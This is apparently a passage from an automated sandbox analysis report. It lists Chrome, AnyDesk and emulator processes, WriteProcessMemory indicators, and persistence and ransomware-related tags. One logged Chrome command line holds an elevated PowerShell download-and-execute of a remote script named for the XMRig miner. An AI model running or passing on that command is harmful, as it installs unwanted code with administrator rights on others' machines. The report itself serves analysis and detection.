N/A N/A C:\Program Files\ReasonLabs\EPP\rsClientSvc.exe N/A
N/A N/A F:\ProjectTitan\Engine\Launcher.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nso2985.tmp\InstallReport.exe N/A
N/A N/A F:\ProjectTitan\Engine\Launcher.exe N/A
N/A N/A F:\ProjectTitan\Engine\ProjectTitan.exe N/A
N/A N/A F:\ProjectTitan\Engine\ProjectTitan.exe N/A
N/A N/A F:\ProjectTitan\Engine\ProjectTitan.exe N/A
N/A N/A F:\BlueStacks X\BlueStacks X.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3832 wrote to memory of 3160 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 3160 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 1404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 3404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 3404 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3832 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8aaa8ab58,0x7ff8aaa8ab68,0x7ff8aaa8ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1596 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2220 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2980 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3000 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4128 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3000 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3380 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3392 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4088 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3416 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4772 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4800 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3924 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2b4 0x4c4

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3308 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3276 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5100 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5248 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4936 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5968 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5992 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5964 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Users\Admin\Downloads\AnyDesk.exe

"C:\Users\Admin\Downloads\AnyDesk.exe"

C:\Users\Admin\Downloads\AnyDesk.exe

"C:\Users\Admin\Downloads\AnyDesk.exe" --local-service

C:\Users\Admin\Downloads\AnyDesk.exe

"C:\Users\Admin\Downloads\AnyDesk.exe" --local-control

C:\Users\Admin\Downloads\AnyDesk.exe

"C:\Users\Admin\Downloads\AnyDesk.exe" --backend

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=2288 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5940 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=5860 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=3416 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=4796 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=3916 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=2508 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4744 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4852 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=6304 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=6632 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=6712 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=6840 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=6208 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=7120 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=7276 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=7536 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=7724 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=7844 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=7884 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6204 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=7984 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8352 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8364 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=8700 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=8704 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=9008 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=9140 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=8972 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=9444 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1

C:\Users\Admin\Downloads\LDPlayer9_ens_1252_ld.exe

"C:\Users\Admin\Downloads\LDPlayer9_ens_1252_ld.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

